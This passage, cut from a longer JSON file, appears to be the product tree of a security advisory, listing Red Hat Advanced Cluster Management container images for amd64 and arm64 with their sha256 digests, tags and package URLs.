"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3A243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773639113"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3Af9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259185"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3A030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680856"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3Ae94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773185877"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773531422"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3Afdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259176"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3Ac409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773283045"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773963430"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773285089"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3A93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1772926643"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3A5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259174"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"product_id": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/endpoint-monitoring-rhel9-operator@sha256%3Af734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737268"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-addon-controller-rhel9@sha256%3A495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233435"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-governance-policy-framework-addon-rhel9@sha256%3A371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1772926628"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"product_id": "registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/governance-policy-propagator-rhel9@sha256%3Abc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259158"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-grafana-rhel9@sha256%3A2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1774002166"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"product_id": "registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"product_identification_helper": {
"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3A1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737272"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3A1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773099456"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3A78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773531402"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3A6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773090422"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3Addeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3Ab3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259171"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3Ad41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773940676"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3A12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3Af09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773674653"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3A7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773737255"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3Ac603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773259182"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3Ad4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773358651"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3Ac6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773090513"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"product_id": "registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"product_identification_helper": {
"purl": "pkg:oci/multiclusterhub-rhel9@sha256%3A943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773145770"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3A5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773358606"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3A5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680755"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773185861"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773233517"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3A3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680743"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3A7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2\u0026tag=1773680634"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"product": {
